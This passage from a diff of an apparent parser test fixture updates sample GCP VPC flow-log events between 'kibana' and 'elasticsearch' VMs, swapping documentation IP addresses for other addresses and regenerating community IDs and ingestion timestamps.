/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075665334Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -17220,18 +17220,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 185295, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 244 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:F2vkpY9ubcm/3+J6iCqgHtizLiU=", + "community_id": "1:yhUOdMY4PRkYtxw6pyH0V3578CI=", "bytes": 185295, "name": "default", "transport": "tcp", @@ -17253,7 +17253,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -17290,8 +17290,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869064200Z", - "original": "{\"insertId\":\"19im82tfdygznk\",\"jsonPayload\":{\"bytes_sent\":\"185295\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392130200Z", + "original": 
"{\"insertId\":\"19im82tfdygznk\",\"jsonPayload\":{\"bytes_sent\":\"185295\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:49.549471457Z", @@ -17320,17 +17320,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 49438, "bytes": 68961, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 711 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:XQBVj/qvQirewgJk7seie1WKY/s=", + "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", "bytes": 68961, "transport": "tcp", "type": "ipv4", @@ -17344,7 +17344,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -17369,8 +17369,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869067200Z", - "original": "{\"insertId\":\"19im82tfdygznm\",\"jsonPayload\":{\"bytes_sent\":\"68961\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":49438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"711\",\"reporter\":\"DEST\",\"rtt_msec\":\"114\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392134Z", + "original": 
"{\"insertId\":\"19im82tfdygznm\",\"jsonPayload\":{\"bytes_sent\":\"68961\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"711\",\"reporter\":\"DEST\",\"rtt_msec\":\"114\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.398463104Z", "end": "2019-06-14T03:49:56.220725956Z", @@ -17391,10 +17391,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -17408,7 +17408,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uLseEqRu8Dul5leogDK11gQV06U=", + "community_id": "1:NkGfacExXrlt+hMyCxxaT2CdDeM=", "bytes": 62072, "name": "default", "transport": "tcp", @@ -17431,7 +17431,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -17467,8 +17467,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869070100Z", - "original": "{\"insertId\":\"19im82tfdygzob\",\"jsonPayload\":{\"bytes_sent\":\"62072\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392138Z", + "original": 
"{\"insertId\":\"19im82tfdygzob\",\"jsonPayload\":{\"bytes_sent\":\"62072\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072372604Z", "end": "2019-06-14T03:49:59.565272745Z", @@ -17495,18 +17495,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 198326, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 246 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:m09Xemo/1QRUmAThg0ZtnVcAeS8=", + "community_id": "1:KsEQeDpJJQzBIT7y9/jnqOdwYak=", "bytes": 198326, "name": "default", "transport": "tcp", @@ -17528,7 +17528,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -17565,8 +17565,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869073Z", - "original": "{\"insertId\":\"19im82tfdygznc\",\"jsonPayload\":{\"bytes_sent\":\"198326\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392142100Z", + "original": 
"{\"insertId\":\"19im82tfdygznc\",\"jsonPayload\":{\"bytes_sent\":\"198326\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.146956782Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -17587,10 +17587,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -17604,7 +17604,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0T9pXVTCUZ37bK4xUSfPnYkUcHk=", + "community_id": "1:B/prlGvm/LDkdDcuN85b0JOuzto=", "bytes": 61436, "name": "default", "transport": "tcp", @@ -17627,7 +17627,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -17663,8 +17663,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869075700Z", - "original": "{\"insertId\":\"19im82tfdygznj\",\"jsonPayload\":{\"bytes_sent\":\"61436\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392145500Z", + "original": 
"{\"insertId\":\"19im82tfdygznj\",\"jsonPayload\":{\"bytes_sent\":\"61436\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -17685,10 +17685,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -17702,7 +17702,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:nOR2MzlGdRdAPthTbrK2arYttrs=", + "community_id": "1:rnN2XV4CYsUrxmk67rUeU4blQzU=", "bytes": 66791, "name": "default", "transport": "tcp", @@ -17725,7 +17725,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -17761,8 +17761,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869078600Z", - "original": "{\"insertId\":\"19im82tfdygzo5\",\"jsonPayload\":{\"bytes_sent\":\"66791\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"355\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392149800Z", + "original": 
"{\"insertId\":\"19im82tfdygzo5\",\"jsonPayload\":{\"bytes_sent\":\"66791\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"355\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075665334Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -17789,17 +17789,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 54812, "bytes": 1457, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:iNSkH+XbFsPOGDVjlyGh+11nIrk=", + "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", "bytes": 1457, "transport": "tcp", "type": "ipv4", @@ -17813,7 +17813,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -17838,8 +17838,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869081400Z", - "original": "{\"insertId\":\"19im82tfdygzod\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":54812},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392155400Z", + "original": 
"{\"insertId\":\"19im82tfdygzod\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":54812},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:20.595119257Z", "end": "2019-06-14T03:45:20.708994883Z", @@ -17860,10 +17860,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -17877,7 +17877,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:F2vkpY9ubcm/3+J6iCqgHtizLiU=", + "community_id": "1:yhUOdMY4PRkYtxw6pyH0V3578CI=", "bytes": 64466, "name": "default", "transport": "tcp", @@ -17900,7 +17900,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -17936,8 +17936,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869084300Z", - "original": "{\"insertId\":\"19im82tfdygzna\",\"jsonPayload\":{\"bytes_sent\":\"64466\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392160900Z", + "original": 
"{\"insertId\":\"19im82tfdygzna\",\"jsonPayload\":{\"bytes_sent\":\"64466\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc